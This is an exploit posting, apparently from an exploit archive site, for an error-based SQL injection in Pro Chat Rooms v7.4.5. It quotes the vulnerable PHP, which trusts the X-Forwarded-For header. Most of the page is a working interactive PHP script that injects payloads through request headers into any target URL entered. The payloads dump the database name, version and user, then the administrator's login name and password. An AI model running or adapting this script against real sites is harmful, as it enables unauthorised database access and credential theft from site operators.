facebook facebook twitter rss

Pro Chat Rooms v7.4.5 Error Based Sql

Author: DzKabyle , Published: 16-07-2014
<?

/*

../include/function.php

function getIP()
{
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

if ($ip == '')
{
$ip = $_SERVER['REMOTE_ADDR'];
}

return $ip;
}

../include/function.php

function updateGuestAvatar($loginGender)
{

// update watching, webcam, avatar
$sql = "UPDATE prochatrooms_users
SET avatar = '".makeSafe($loginGender)."', userIP = '".getIP()."', guest = '".$_SESSION['guest']."'
WHERE username = '".makeSafe($_SESSION['username'])."'";
mysql_query($sql)
or die(mysql_error());

}

../index.php

if($_POST['isGuest'])
{
updateGuestAvatar($_REQUEST['genderID']);
}

*/

print "\n+-------------------------------------------------------------------------+";
print "\n| Pro Chat Rooms v7.4.5 Error Based Sql Injection |";
print "\n| dzkabyle (www.sec4ever.com) |";
print "\n+-------------------------------------------------------------------------+\n\n\n";



function dzkabyle($url,$pay){
$post="login=1&isGuest=1&userName=dds&userPass=&roomID=1341399832&langID=1&genderID=1&newLogin.x=0&newLogin.y=0";
$dzkabyle = curl_init();
curl_setopt($dzkabyle, CURLOPT_URL, "http://".replace($url)."/index.php");
curl_setopt($dzkabyle, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");

curl_setopt($dzkabyle, CURLOPT_HTTPHEADER, array("REMOTE_ADDR: $pay", "X_FORWARDED_FOR: $pay"));
curl_setopt($dzkabyle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($dzkabyle, CURLOPT_POST, 1);
curl_setopt($dzkabyle, CURLOPT_POSTFIELDS, $post);
curl_setopt($dzkabyle, CURLOPT_COOKIEFILE, "dz.txt");
curl_setopt($dzkabyle, CURLOPT_COOKIEJAR, "/");
return $result = ex(curl_exec($dzkabyle));

curl_close($dzkabyle);

}


function exploit($t){
$database="1' and(select 1 from(select count(*),concat((select (select concat(0x3c3a3e,HERE,0x3c3a3e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";



$db=dzkabyle($t,str_ireplace("HERE","database()",$database));
echo "database : ".$db[1]." \n";

$tb=dzkabyle($t,str_ireplace("HERE","version()",$database));
echo "Version : ".$tb[1]." \n";

$user=dzkabyle($t,str_ireplace("HERE","user()",$database));
echo "USER : ".$user[1]." \n";

$table="1' And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(0x3c3a3e,admin,0x3c3a3e,adminLogin,0x3c3a3e),1,150)from prochatrooms_config where id=1 limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z) and '1'='1";

$ab=dzkabyle($t,$table);

echo "admin name : ".$ab[1]." \n";
echo "admin passowrd : ".$ab[2]."\n";


}


function ex($ur){
$ur=explode("<:>",$ur);
return $ur;
}
function replace($ur){
$ur=str_ireplace("http://",'',$ur);
$ur=str_ireplace("https://",'',$ur);
return $ur;
}

while(1){
print "Your URL @ : ";
if (($fa = trim(fgets(STDIN))) == "bye") exit("\n+ Exiting");
$response = exploit($fa);
print "\n".$response."\n";
}






?>

Like us on Facebook :